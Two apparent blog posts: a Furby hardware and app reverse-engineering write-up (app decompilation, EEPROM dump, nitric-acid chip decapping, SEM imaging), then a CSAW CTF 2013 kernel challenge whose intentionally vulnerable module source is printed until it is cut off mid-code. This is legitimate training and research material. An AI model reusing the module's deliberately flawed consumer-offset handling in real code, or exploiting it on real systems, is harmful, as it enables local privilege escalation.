Reverse Engineering a Furby

Introduction

This past semester I’ve been working on a directed study at my university with Prof. Wil Robertson reverse engineering embedded devices.  After a couple of months looking at a passport scanner, one of my friends jokingly suggested I hack a Furby, the notoriously annoying toy of late 1990s fame.  Everyone laughed, and we all moved on with our lives.

However, the joke didn’t stop there.  Within two weeks, this same friend said they had a present for me.  And that’s how I started reverse engineering a Furby.

About the Device

A Furby is an evil robotic children’s toy wrapped in colored fur.  Besides speaking its own gibberish-like language called Furbish, a variety of sensors and buttons allow it to react to different kinds of stimuli.

Since its original debut in 1998, the Furby apparently received a number of upgrades and new features.  The specific model I looked at was from 2012, which supported communication between devices, sported LCD eyes, and even came with a mobile app.

Inter-Device Communication

As mentioned above, one feature of the 2012 version was the toy’s ability to communicate with other Furbys as well as the mobile app.  However, after some investigation I realized that it didn’t use Bluetooth, RF, or any other common wireless protocols.  Instead, a look at the official Hasbro Furby FAQ told a more interesting story:

Q. There is a high pitched tone coming from Furby and/or my iOS device.

A. The noise you are hearing is how Furby communicates with the mobile device and other Furbys. Some people may hear it, others will not. Some animals may also hear the noise. Don’t worry, the tone will not cause any harm to people or animals.

Digging into this lead, I learned that Furbys in fact perform inter-device communication with an audio protocol that encodes data into bursts of high-pitch frequencies.  That is, devices communicate with one another via high-pitch sound waves with a speaker and microphone.  #badBIOS anyone?

This was easily confirmed by use of the mobile app which emitted a modulated sound similar to the mosquito tone whenever an item or command was sent to the Furby.  The toy would also respond with a similar sound which was recorded by the phone’s microphone and decoded by the app.

Upon searching, I learned that other individuals had performed a bit of prior work in analyzing this protocol.  Notably, the GitHub project Hacksby appears to have successfully reverse engineered the packet specification, developed scripts to encode and decode data, and compiled a fairly complete database of events understood by the Furby.

Reversing the Android App

Since the open source database of events is not currently complete, I decided to spend a few minutes looking at the Android app to identify how it performed its audio decoding.

After grabbing the .apk via APK Downloader, it was simple work to get to the app’s juicy bits:

$ unzip -q com.hasbro.furby.apk
$ d2j-dex2jar.sh classes.dex
dex2jar classes.dex -> classes-dex2jar.jar
$

Using jd-gui, I then decompiled classes-dex2jar.jar into a set of .java source files.  I skimmed through the source files of a few app features that utilized the communication protocol (e.g., Deli, Pantry, Translator) and noticed a few calls to methods named sendComAirCmd().

Each method accepted an integer as input, which was spliced and passed to objects created from the generalplus.com.GPLib.ComAirWrapper class:

private void sendComAirCmd(int paramInt)
{    
  Logger.log(Deli.TAG, "sent command: " + paramInt);
  Integer localInteger1 = Integer.valueOf(paramInt);
  int i = 0x1F & localInteger1.intValue() >> 5;
  int j = 32 + (0x1F & localInteger1.intValue());
  ComAirWrapper.ComAirCommand[] arrayOfComAirCommand = new ComAirWrapper.ComAirCommand[2];
  ComAirWrapper localComAirWrapper1 = this.comairWrapper;
  localComAirWrapper1.getClass();
  arrayOfComAirCommand[0] = new ComAirWrapper.ComAirCommand(localComAirWrapper1, i, 0.5F);
  ComAirWrapper localComAirWrapper2 = this.comairWrapper;
  localComAirWrapper2.getClass();
  arrayOfComAirCommand[1] = new ComAirWrapper.ComAirCommand(localComAirWrapper2, j, 0.0F);
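
To make the splicing concrete, here is a minimal C sketch of the same arithmetic. The names `comair_pair` and `split_command` are hypothetical and mine, not GPLib's; only the shift, the masks, and the +32 offset come from the decompiled Java above.

```c
#include <assert.h>

/* Hypothetical container for the two values handed to ComAirCommand. */
struct comair_pair {
    int high; /* bits 5..9 of the command, range 0..31 */
    int low;  /* bits 0..4 of the command plus 32, range 32..63 */
};

/* Mirrors the arithmetic in sendComAirCmd(): the command is cut into
 * two 5-bit halves and the low half is offset by 32, so the two
 * values never share a range. */
static struct comair_pair split_command(int cmd)
{
    struct comair_pair p;

    /* The masks keep only the low 10 bits; anything wider would be
     * silently truncated, so this sketch rejects it up front. */
    assert(cmd >= 0 && cmd <= 0x3FF);

    p.high = (cmd >> 5) & 0x1F;
    p.low  = 32 + (cmd & 0x1F);
    return p;
}
```

For example, `split_command(350)` yields `high = 10` and `low = 62`.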

The name generalplus appears to identify the Taiwanese company General Plus, which “engage[s] in the research, development, design, testing and sales of high quality, high value-added consumer integrated circuits (ICs).”  I was unable to find any public information about the GPLib/ComAir library.  However, a thread on /g/ from 2012 appears to have made some steps towards identifying the General Plus chip, among others.

The source code at generalplus/com/GPLib/ComAirWrapper.java defined a number of methods providing wrapper functionality around encoding and decoding data, though none of the functionality itself.  Continuing to dig, I found the file libGPLibComAir.so:

$ file lib/armeabi/libGPLibComAir.so 
lib/armeabi/libGPLibComAir.so: ELF 32-bit LSB shared object, ARM, version 1 (SYSV), dynamically linked, stripped

Quick analysis on the binary showed that this was likely the code I had been looking for:

$ nm -D lib/armeabi/libGPLibComAir.so | grep -i -e encode -e decode -e command
0000787d T ComAir_GetCommand
00004231 T Java_generalplus_com_GPLib_ComAirWrapper_Decode
000045e9 T Java_generalplus_com_GPLib_ComAirWrapper_GenerateComAirCommand
00004585 T Java_generalplus_com_GPLib_ComAirWrapper_GetComAirDecodeMode
000045c9 T Java_generalplus_com_GPLib_ComAirWrapper_GetComAirEncodeMode
00004561 T Java_generalplus_com_GPLib_ComAirWrapper_SetComAirDecodeMode
000045a5 T Java_generalplus_com_GPLib_ComAirWrapper_SetComAirEncodeMode
000041f1 T Java_generalplus_com_GPLib_ComAirWrapper_StartComAirDecode
00004211 T Java_generalplus_com_GPLib_ComAirWrapper_StopComAirDecode
00005af5 T _Z13DecodeRegCodePhP15tagCustomerInfo
000058cd T _Z13EncodeRegCodethPh
00004f3d T _ZN12C_ComAirCore12DecodeBufferEPsi
00004c41 T _ZN12C_ComAirCore13GetDecodeModeEv
00004ec9 T _ZN12C_ComAirCore13GetDecodeSizeEv
00004b69 T _ZN12C_ComAirCore13SetDecodeModeE16eAudioDecodeMode
000050a1 T _ZN12C_ComAirCore16SetPlaySoundBuffEP19S_ComAirCommand_Tag
00004e05 T _ZN12C_ComAirCore6DecodeEPsi
00005445 T _ZN15C_ComAirEncoder10SetPinCodeEs
00005411 T _ZN15C_ComAirEncoder11GetiDfValueEv
0000547d T _ZN15C_ComAirEncoder11PlayCommandEi
000053fd T _ZN15C_ComAirEncoder11SetiDfValueEi
00005465 T _ZN15C_ComAirEncoder12IsCmdPlayingEv
0000588d T _ZN15C_ComAirEncoder13GetComAirDataEPPcRi
000053c9 T _ZN15C_ComAirEncoder13GetEncodeModeEv
000053b5 T _ZN15C_ComAirEncoder13SetEncodeModeE16eAudioEncodeMode
000053ed T _ZN15C_ComAirEncoder14GetCentralFreqEv
00005379 T _ZN15C_ComAirEncoder14ReleasePlayersEv
000053d9 T _ZN15C_ComAirEncoder14SetCentralFreqEi
000056c1 T _ZN15C_ComAirEncoder15GenComAirBufferEiPiPs
00005435 T _ZN15C_ComAirEncoder15GetWaveFormTypeEv
000054bd T _ZN15C_ComAirEncoder15PlayCommandListEiP20tagComAirCommandList
00005421 T _ZN15C_ComAirEncoder15SetWaveFormTypeEi
00005645 T _ZN15C_ComAirEncoder17PlayComAirCommandEif
00005755 T _ZN15C_ComAirEncoder24FillWavInfoAndPlayBufferEiPsf
00005369 T _ZN15C_ComAirEncoder4InitEv
000051f9 T _ZN15C_ComAirEncoderC1Ev
000050b9 T _ZN15C_ComAirEncoderC2Ev
00005351 T _ZN15C_ComAirEncoderD1Ev
00005339 T _ZN15C_ComAirEncoderD2Ev

I loaded the binary in IDA Pro and quickly confirmed my thought.  The method generalplus.com.GPLib.ComAirWrapper.Decode() decompiled to the following function:

unsigned int __fastcall Java_generalplus_com_GPLib_ComAirWrapper_Decode(int a1, int a2, int a3)
{
  int v3; // ST0C_4@1
  int v4; // ST04_4@1
  int v5; // ST1C_4@1
  const void *v6; // ST18_4@1
  unsigned int v7; // ST14_4@1

  v3 = a1;
  v4 = a3;
  v5 = _JNIEnv::GetArrayLength();
  v6 = (const void *)_JNIEnv::GetShortArrayElements(v3, v4, 0);
  v7 = C_ComAirCore::DecodeBuffer((int)&unk_10EB0, v6, v5);
  _JNIEnv::ReleaseShortArrayElements(v3);
  return v7;
}

Within C_ComAirCore::DecodeBuffer() resided a looping call to ComAir_DecFrameProc() which appeared to be referencing some table of phase coefficients:

int __fastcall ComAir_DecFrameProc(int a1, int a2)
{
  int v2; // r5@1
  signed int v3; // r4@1
  int v4; // r0@3
  int v5; // r3@5
  signed int v6; // r2@5

  v2 = a1;
  v3 = 0x40;
  if ( ComAir_Rate_Mode != 1 )
  {
    v3 = 0x80;
    if ( ComAir_Rate_Mode == 2 )
      v3 = 0x20;
  }
  v4 = (a2 << 0xC) / 0x64;
  if ( v4 > (signed int)&PHASE_COEF[0x157F] )
    v4 = (int)&PHASE_COEF[0x157F];
  v5 = v2;
  v6 = 0;
  do
  {
    ++v6;
    *(_WORD *)v5 = (unsigned int)(*(_WORD *)v5 * v4) >> 0x10;
    v5 += 2;
  }
  while ( v3 > v6 );
  ComAirDec();
  return ComAir_GetCommand();
}

Near the end of the function was a call to the very large function ComAirDec(), which was likely decompiled with the wrong number of arguments and which appeared to perform the bulk of the audio decoding.  Data was transformed and parsed, and a number of symbols apparently associated with frequency-shift keying were referenced.
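
The part of ComAir_DecFrameProc() that runs before ComAirDec() is easier to follow once the decompiler noise is stripped away. The following is my reading of it as a C sketch, not GPLib's source: `frame_len`, `scale_frame`, `percent`, and `max_gain` are hypothetical names, and `max_gain` stands in for the clamp value, which the decompiler rendered as an address expression and which I could not recover.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Frame length in samples, following the ComAir_Rate_Mode branches:
 * mode 1 -> 0x40, mode 2 -> 0x20, anything else -> 0x80. */
static size_t frame_len(int rate_mode)
{
    if (rate_mode == 1)
        return 0x40;
    if (rate_mode == 2)
        return 0x20;
    return 0x80;
}

/* Scale one frame of 16-bit samples in place.  `percent` plays the
 * role of the a2 argument; `max_gain` is an assumed placeholder for
 * the unknown clamp constant. */
static void scale_frame(uint16_t *frame, int rate_mode,
                        int percent, int32_t max_gain)
{
    /* Bounds chosen so neither the shift nor the multiply overflows. */
    assert(frame != NULL);
    assert(percent >= 0 && percent <= 0x7FFFF);
    assert(max_gain >= 0 && max_gain <= 0xFFFF);

    int32_t gain = (percent << 12) / 100;   /* same as (a2 << 0xC) / 0x64 */
    if (gain > max_gain)
        gain = max_gain;

    size_t n = frame_len(rate_mode);
    for (size_t i = 0; i < n; i++)
        frame[i] = (uint16_t)(((uint32_t)frame[i] * (uint32_t)gain) >> 16);
}
```

With `percent = 100` the gain works out to 4096, so a sample of 0x8000 becomes 2048 after the shift.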

Itching to continue onto reverse engineering the hardware, I began disassembling the device.

Reversing the Hardware

Actually disassembling the Furby itself proved more difficult than expected due to the form factor of the toy and number of hidden screws.  Since various tear-downs of the hardware are already available online, let’s just skip ahead to extracting juicy secrets from the device.

The heart of the Furby lies in the following two-piece circuit board:

Thanks to another friend, I also had access to a second Furby 2012 model, this time the French version.  Although the circuit boards of both devices were incredibly similar, differences did exist, most notably in the layout of the right-hand daughterboard. Additionally, the EEPROM chip (U2 on the board) was branded Shenzhen LIZE on the U.S. version, while the French version was branded ATMEL:

The first feature I noticed about the boards was the fact that a number of chips were hidden by a thick blob of epoxy.  This is likely meant to thwart reverse engineers, as many of the important chips on the Furby are actually proprietary and designed (or at least contracted for development) by Hasbro.  This is a standard PCB assembly technique known as “chip-on-board” or “direct chip attachment,” though it proves harder to identify the chips due to the lack of markings.  However, one may still simply inspect the traces connected to the chip and infer its functionality from there.

For now, let’s start with something more accessible and dump the exposed EEPROM.

Dumping the EEPROM

The EEPROM chip on the French version Furby is fairly standard and may be easily identified by its form and markings:

By googling the markings, we find the datasheet and learn that it is a 24Cxx family EEPROM chip manufactured by ATMEL. This particular chip provides 2048 bits of memory (256 bytes), speaks I2C, and offers a write protect pin to prevent accidental data corruption.  The chip on the U.S. version Furby has similar specs but is marked L24C02B-SI and manufactured by Shenzhen LIZE.

Using the same technique as on my Withings WS-30 project, I used a heat gun to desolder the chip from the board.  Note that this MUST be done in a well-ventilated area. Intense, direct heat will likely scorch the board and release horrible chemicals into the air.

Unlike my Withings WS-30 project, however, I no longer had access to an ISP programmer and would need to wire the EEPROM manually.  I chose to use my Arduino Duemilanove since it provides an I2C interface and accompanying libraries for easy development.

Referencing the datasheet, we find that there are eight total pins to deal with.  Pins 1-3 (A0, A1, A2) are device address input pins and are used to assign a unique identifier to the chip. Since multiple EEPROM chips may be wired in parallel, a method must be used to identify which chip a controller wishes to speak with.  By pulling the A0, A1, and A2 pins high or low, a 3-bit number is formed that uniquely identifies the chip.  Since we only have one EEPROM, we can simply tie all three to ground.  Likewise, pin 4 (GND) is also connected to ground.
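
The 3-bit number formed by A2, A1, and A0 ends up as the low bits of the chip's 7-bit I2C address, after the fixed 1010 prefix that 24Cxx parts use. A minimal C sketch of that calculation follows; the function name `eeprom_i2c_address` is hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* 7-bit I2C address of a 24C02-style EEPROM: the fixed 1010 prefix
 * followed by the logic levels strapped onto A2, A1, and A0. */
static uint8_t eeprom_i2c_address(int a2, int a1, int a0)
{
    /* Each pin is either tied low (0) or high (1). */
    assert(a2 == 0 || a2 == 1);
    assert(a1 == 0 || a1 == 1);
    assert(a0 == 0 || a0 == 1);

    return (uint8_t)(0x50 | (a2 << 2) | (a1 << 1) | a0);
}
```

With all three pins grounded this gives 0x50, which is the address the Arduino sketch in this section uses.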

Pins 5 and 6 (SDA, SCL) designate the data and clock pins on the chip, respectively. These pins are what give “Two Wire Interface” (TWI) its name, as full communication may be achieved with just these two lines.  SDA provides bi-directional serial data transfer, while SCL provides a clock signal.

Pin 7 (WP) is the write protect pin and provides a means to place the chip in read-only mode.  Since we have no intention of writing to the chip (we only want to read the chip without corrupting its contents), we can pull this pin high (5 volts).  Note that some chips provide a “negative” WP pin; that is, connecting it to ground will enable write protection and pulling it high will disable it.  Pin 8 (VCC) is also connected to the same positive power source.

After some time learning the Wire library and looking at example code online, I used the following Arduino sketch to successfully dump 256 bytes of data from the French version Furby EEPROM chip:

#include <Wire.h>

#define disk1 0x50    // Address of eeprom chip

byte i2c_eeprom_read_byte( int deviceaddress, unsigned int eeaddress ) {
    byte rdata = 0x11;
    Wire.beginTransmission(deviceaddress);
//    Wire.write((int)(eeaddress >> 8)); // MSB
    Wire.write((int)(eeaddress & 0xFF)); // LSB
    Wire.endTransmission();
    Wire.requestFrom(deviceaddress,1);
    if (Wire.available()) rdata = Wire.read();
    return rdata;

}

void setup(void)
{
  Serial.begin(9600);
  Wire.begin();  

  unsigned int i, j;
  unsigned char b;

  for ( i = 0; i < 16; i++ )
  {
    for ( j = 0; j < 16; j++ )
    {
      b = i2c_eeprom_read_byte(disk1, (i * 16) + j);
      if ( (b & 0xf0) == 0 )
        Serial.print("0");
      Serial.print(b, HEX);
      Serial.print(" ");
    }
    Serial.println();
  }

}

void loop(){}

Note that unlike most code examples online, the “MSB” line of code within i2c_eeprom_read_byte() is commented out.  Since our EEPROM chip holds only 256 bytes, an 8-bit memory address (a single byte) covers the whole chip.  Chips with larger capacities need more address bits (9 bits, 10 bits, and so on), and those that take a two-byte address need the MSB line to accommodate all of the necessary address bits.
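
The difference between the two addressing styles comes down to which bytes are written before the read. Here is a small C sketch of that choice, independent of the Wire library; `eeprom_word_address` and its `two_byte` flag are hypothetical names for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Fill `out` with the address bytes sent ahead of a read and return
 * how many there are.  `two_byte` is nonzero for parts that expect a
 * 16-bit address; the 256-byte chip here uses a single byte. */
static size_t eeprom_word_address(unsigned int addr, int two_byte,
                                  uint8_t out[2])
{
    size_t n = 0;

    assert(out != NULL);
    assert(addr <= 0xFFFF);

    if (two_byte)
        out[n++] = (uint8_t)(addr >> 8);   /* MSB: the commented-out line */
    out[n++] = (uint8_t)(addr & 0xFF);     /* LSB: always sent */
    return n;
}
```

For the Furby's chip, `eeprom_word_address(0xF8, 0, out)` returns 1 and stores 0xF8; a two-byte part given 0x1234 would get 0x12 followed by 0x34.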

Upon running the sketch, we are presented with the following output:

2F 64 00 00 00 00 5A EB 2F 64 00 00 00 00 5A EB 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
05 00 00 04 00 00 02 18 05 00 00 04 00 00 02 18 
0F 00 00 00 00 00 18 18 0F 00 00 00 00 00 18 18 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8

Unfortunately, without much guidance or further analysis of the hardware (perhaps at runtime), it is difficult to make sense of this data.  By watching the contents change over time or in response to specific events, it may be possible to gain a better understanding of these few bytes.
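
One pattern is visible without any runtime analysis: in most rows the second eight bytes repeat the first eight. The C sketch below checks this for the four non-zero rows, transcribed from the output above (every other row is all zeros and so trivially repeats). The names are hypothetical, and whether the repetition is a deliberate redundancy scheme is only a guess.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define ROW_LEN 16

/* Returns 1 if the second half of a 16-byte row repeats the first. */
static int row_is_mirrored(const uint8_t row[ROW_LEN])
{
    assert(row != NULL);
    return memcmp(row, row + ROW_LEN / 2, ROW_LEN / 2) == 0;
}

/* Non-zero rows of the dump, at offsets 0x00, 0x20, 0x30, and 0xF0. */
static const uint8_t dump_rows[4][ROW_LEN] = {
    { 0x2F, 0x64, 0x00, 0x00, 0x00, 0x00, 0x5A, 0xEB,
      0x2F, 0x64, 0x00, 0x00, 0x00, 0x00, 0x5A, 0xEB },
    { 0x05, 0x00, 0x00, 0x04, 0x00, 0x00, 0x02, 0x18,
      0x05, 0x00, 0x00, 0x04, 0x00, 0x00, 0x02, 0x18 },
    { 0x0F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x18,
      0x0F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x18 },
    { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF8 },
};
```

The first three rows pass the check; the last row, with its lone trailing F8, does not.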

Decapping Proprietary Chips

With few other interesting chips freely available to probe, I turned my focus to the proprietary chips hidden by epoxy.  Having seen a number of online resources showcase the fun that is chip decapping, I had the urge to try it myself.  Additionally, the use of corrosive acid might just solve the issue of the epoxy in itself.

Luckily, with the assistance and guidance of my Chemistry professor Dr. Geoffrey Davies, I was able to utilize the lab resources of my university and decap chips in a proper and safe manner.

First, I isolated the three chips I wanted to decap (henceforth referenced as tiny, medium, and large) by desoldering their individual boards from the main circuit board. Since the large chip was directly connected to the underside of the board, I simply took a pair of shears and cut around it.

Each chip was placed in its own beaker of 70% nitric acid (HNO3) on a hot plate at 68°C. Great care was taken to ensure that absolutely no amount of HNO3 came in contact with skin or was accidentally consumed.  The entire experiment took place in a fume hood which ensured that the toxic nitrogen dioxide (NO2) gas produced by the reaction was safely evacuated and not breathed in.

Each sample took a different amount of time to fully decompose the epoxy, circuit board, and chip casing depending on its size.  Since I was working with a lower-concentration nitric acid than professionals typically use (red/white fuming nitric acid is generally preferred), the overall process took between one and three hours.

“Medium” (left) and “Tiny” (right)

After each chip had been fully exposed and any leftover debris removed, I took the beakers off the hot plate, let them cool, and decanted the remaining nitric acid into a waste collection beaker, leaving the decapped chips behind. A small amount of distilled water was then added to each beaker and the contents poured onto filter paper.  After one or two more rinses with distilled water, each sample was rinsed with acetone two or three times.

The large chip took the longest to finish simply due to the size of the attached circuit board fragment.  About 2.5 hours in, the underside of the chip had been exposed, though the epoxy blob had still not been entirely decomposed.  At this point, the bonding wires for the chip (guessed to be a microcontroller) were still visible and intact:

About thirty minutes later and with the addition of more nitric acid, all three samples were cleaned and ready for imaging:

SEM Imaging of Decapped Chips

The final step was to take high resolution images of each chip to learn more about its design and identify any potential manufacturer markings.  Once again, I leveraged university resources and was able to make use of a Hitachi S-4800 scanning electron microscope (SEM) with great thanks to Dr. William Fowle.

Each decapped chip was placed on a double-sided adhesive attached to a sample viewing plate.  A few initial experimental SEM images were taken; however a number of artifacts were present that severely affected the image quality.

To counter this, a small amount of colloidal graphite paint was added around the edges of each chip to provide a pathway to ground for the electrons.  Additionally, the viewing plate was treated in a sputter coater machine where each chip was coated with 4.5nm of palladium to create a more conductive surface.

After treatment, the samples were placed back in the SEM and imaged with greater success.  Each chip was imaged in pieces, and each individual image was stitched together to form a single large, high resolution picture.  The small and large chip overview images were shot at 5.0kV at 150x magnification, while the medium chip overview image was shot at 5.0kV at 30x magnification:

Unfortunately, as can be seen in the image above, the medium chip did not appear to have cleaned completely in its nitric acid bath.  Although it is believed to be a memory storage device of some sort (by looking at optical images), it is impossible to discern any finer details from the SEM image.

A number of interesting features were found during the imaging process.  The marking “GHG554” may be clearly seen directly west on the small chip.  Additionally, in similar font face, the marking “GFI392” may be seen on the south-east corner of the large chip:

Higher zoom images were also taken of generally interesting topology on the chips.  For instance, the following two images show what looks like a “cheese grater” feature on both the small and large chips:

If you are familiar with any of these chips or their features, feedback would be greatly appreciated.

EDIT: According to cpldcpu, thebobfoster, and Thilo, the “cheese grater” structures are likely bond pads.

Additional images taken throughout this project are available at: http://www.flickr.com/photos/mncoppola/

Tremendous thanks go out to the following people for their guidance and donation of time and resources towards this project:

CSAW CTF 2013 Kernel Exploitation Challenge

Introduction

CSAW CTF 2013 was last weekend, and this year I was lucky enough to be named a judge for the competition.  I decided to bring back the Linux kernel exploitation tradition of previous years and submitted the challenge “Brad Oberberg.”  Four of the 15 teams successfully solved the challenge.

Each team was presented with unprivileged access to a live VM running 32-bit Ubuntu 12.04.3 LTS.  The vulnerable kernel module csaw.ko was loaded on each system, and successful exploitation would allow for local privilege escalation and subsequent reading of the flag.  Source code to the kernel module was provided to each team, and may be viewed below (or downloaded here):

/*
 *                      .ed"""" """$$$$be.
 *                    -"           ^""**$$$e.
 *                  ."                   '$$$c
 *                 /     C S A W          "4$$b
 *                d  3      2 0 1 3         $$$$
 *                $  *                   .$$$$$$
 *               .$  ^c           $$$$$e$$$$$$$$.
 *               d$L  4.         4$$$$$$$$$$$$$$b
 *               $$$$b ^ceeeee.  4$$ECL.F*$$$$$$$
 *   e$""=.      $$$$P d$$$$F $ $$$$$$$$$- $$$$$$
 *  z$$b. ^c     3$$$F "$$$$b   $"$$$$$$$  $$$$*"      .=""$c
 * 4$$$$L        $$P"  "$$b   .$ $$$$$...e$$        .=  e$$$.
 * ^*$$$$$c  %..   *c    ..    $$ 3$$$$$$$$$$eF     zP  d$$$$$
 *   "**$$$ec   "   %ce""    $$$  $$$$$$$$$$*    .r" =$$$$P""
 *         "*$b.  "c  *$e.    *** d$$$$$"L$$    .d"  e$$***"
 *           ^*$$c ^$c $$$      4J$$$$$% $$$ .e*".eeP"
 *              "$$$$$$"'$=e....$*$$**$cz$$" "..d$*"
 *                "*$$$  *=%4.$ L L$ P3$$$F $$$P"
 *                   "$   "%*ebJLzb$e$$$$$b $P"
 *                     %..      4$$$$$$$$$$ "
 *                      $$$e   z$$$$$$$$$$%
 *                       "*$c  "$$$$$$$P"
 *                        ."""*$$$$$$$$bc
 *                     .-"    .$***$$$"""*e.
 *                  .-"    .e$"     "*$c  ^*b.
 *           .=*""""    .e$*"          "*bc  "*$e..
 *         .$"        .z*"               ^*$e.   "*****e.
 *         $$ee$c   .d"                     "*$.        3.
 *         ^*$E")$..$"                         *   .ee==d%
 *            $.d$$$*                           *  J$$$e*
 *             """""                              "$$$" Gilo95'
 */

#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/miscdevice.h>
#include <linux/mm.h>
#include <linux/fs.h>
#include <linux/slab.h>
#include <linux/random.h>
#include <linux/list.h>
#include <linux/sched.h>
#include <asm/uaccess.h>

#define DRIVER_VERSION "CSAW SUCKiT v1.3.37"

#define CSAW_IOCTL_BASE     0x77617363
#define CSAW_ALLOC_HANDLE   CSAW_IOCTL_BASE+1
#define CSAW_READ_HANDLE    CSAW_IOCTL_BASE+2
#define CSAW_WRITE_HANDLE   CSAW_IOCTL_BASE+3
#define CSAW_GET_CONSUMER   CSAW_IOCTL_BASE+4
#define CSAW_SET_CONSUMER   CSAW_IOCTL_BASE+5
#define CSAW_FREE_HANDLE    CSAW_IOCTL_BASE+6
#define CSAW_GET_STATS	    CSAW_IOCTL_BASE+7

#define MAX_CONSUMERS 255

struct csaw_buf {
    unsigned long consumers[MAX_CONSUMERS];
    char *buf;
    unsigned long size;
    unsigned long seed;
    struct list_head list;
};

LIST_HEAD(csaw_bufs);

struct alloc_args {
    unsigned long size;
    unsigned long handle;
};

struct free_args {
    unsigned long handle;
};

struct read_args {
    unsigned long handle;
    unsigned long size;
    void *out;
};

struct write_args {
    unsigned long handle;
    unsigned long size;
    void *in;
};

struct consumer_args {
    unsigned long handle;
    unsigned long pid;
    unsigned char offset;
};

struct csaw_stats {
    unsigned long clients;
    unsigned long handles;
    unsigned long bytes_read;
    unsigned long bytes_written;
    char version[40];
};

unsigned long clients = 0;
unsigned long handles = 0;
unsigned long bytes_read = 0;
unsigned long bytes_written = 0;

static int csaw_open ( struct inode *inode, struct file *file )
{
    clients++;

    return 0;
}

static int csaw_release ( struct inode *inode, struct file *file )
{
    clients--;

    return 0;
}

int alloc_buf ( struct alloc_args *alloc_args )
{
    struct csaw_buf *cbuf;
    char *buf;
    unsigned long size, seed, handle;

    size = alloc_args->size;

    if ( ! size )
        return -EINVAL;

    cbuf = kmalloc(sizeof(*cbuf), GFP_KERNEL);
    if ( ! cbuf )
        return -ENOMEM;

    buf = kzalloc(size, GFP_KERNEL);
    if ( ! buf )
    {
        kfree(cbuf);
        return -ENOMEM;
    }

    cbuf->buf = buf;
    cbuf->size = size;

    memset(&cbuf->consumers, 0, sizeof(cbuf->consumers));
    cbuf->consumers[0] = current->pid;

    get_random_bytes(&seed, sizeof(seed));

    cbuf->seed = seed;

    handle = (unsigned long)buf ^ seed;

    list_add(&cbuf->list, &csaw_bufs);

    alloc_args->handle = handle;

    return 0;
}

void free_buf ( struct csaw_buf *cbuf )
{
    list_del(&cbuf->list);
    kfree(cbuf->buf);
    kfree(cbuf);
}

struct csaw_buf *find_cbuf ( unsigned long handle )
{
    struct csaw_buf *cbuf;

    list_for_each_entry ( cbuf, &csaw_bufs, list )
        if ( handle == ((unsigned long)cbuf->buf ^ cbuf->seed) )
            return cbuf;

    return NULL;
}

static long csaw_ioctl ( struct file *file, unsigned int cmd, unsigned long arg )
{
    int ret = 0;
    unsigned long *argp = (unsigned long *)arg;

    switch ( cmd )
    {
        case CSAW_ALLOC_HANDLE:
        {
            int ret;
            struct alloc_args alloc_args;

            if ( copy_from_user(&alloc_args, argp, sizeof(alloc_args)) )
                return -EFAULT;

            if ( (ret = alloc_buf(&alloc_args)) < 0 )
                return ret;

            if ( copy_to_user(argp, &alloc_args, sizeof(alloc_args)) )
                return -EFAULT;

            handles++;

            break;
        }

        case CSAW_READ_HANDLE:
        {
            struct read_args read_args;
            struct csaw_buf *cbuf;
            unsigned int i, authorized = 0;
            unsigned long to_read;

            if ( copy_from_user(&read_args, argp, sizeof(read_args)) )
                return -EFAULT;

            cbuf = find_cbuf(read_args.handle);
            if ( ! cbuf )
                return -EINVAL;

            for ( i = 0; i < MAX_CONSUMERS; i++ )
                 if ( current->pid == cbuf->consumers[i] )
                    authorized = 1;

            if ( ! authorized )
                return -EPERM;

            to_read = min(read_args.size, cbuf->size);

            if ( copy_to_user(read_args.out, cbuf->buf, to_read) )
                return -EFAULT;

            bytes_read += to_read;

            break;
        }

        case CSAW_WRITE_HANDLE:
        {
            struct write_args write_args;
            struct csaw_buf *cbuf;
            unsigned int i, authorized = 0;
            unsigned long to_write;

            if ( copy_from_user(&write_args, argp, sizeof(write_args)) )
                return -EFAULT;

            cbuf = find_cbuf(write_args.handle);
            if ( ! cbuf )
                return -EINVAL;

            for ( i = 0; i < MAX_CONSUMERS; i++ )
                 if ( current->pid == cbuf->consumers[i] )
                    authorized = 1;

            if ( ! authorized )
                return -EPERM;

            to_write = min(write_args.size, cbuf->size);

            if ( copy_from_user(cbuf->buf, write_args.in, to_write) )
                return -EFAULT;

            bytes_written += to_write;

            break;
        }

        case CSAW_GET_CONSUMER:
        {
            struct consumer_args consumer_args;
            struct csaw_buf *cbuf;
            unsigned int i, authorized = 0;

            if ( copy_from_user(&consumer_args, argp, sizeof(consumer_args)) )
                return -EFAULT;

            cbuf = find_cbuf(consumer_args.handle);
            if ( ! cbuf )
                return -EINVAL;

            for ( i = 0; i < MAX_CONSUMERS; i++ )
                 if ( current->pid == cbuf->consumers[i] )
                    authorized = 1;

            if ( ! authorized )
                return -EPERM;

            consumer_args.pid = cbuf->consumers[consumer_args.offset];

            if ( copy_to_user(argp, &consumer_args, sizeof(consumer_args)) )
                return -EFAULT;

            break;
        }

        case CSAW_SET_CONSUMER:
        {
            struct consumer_args consumer_args;
            struct csaw_buf *cbuf;
            unsigned int i, authorized = 0;

            if ( copy_from_user(&consumer_args, argp, sizeof(consumer_args)) )
                return -EFAULT;

            cbuf = find_cbuf(consumer_args.handle);
            if ( ! cbuf )
                return -EINVAL;

            for ( i = 0; i < MAX_CONSUMERS; i++ )
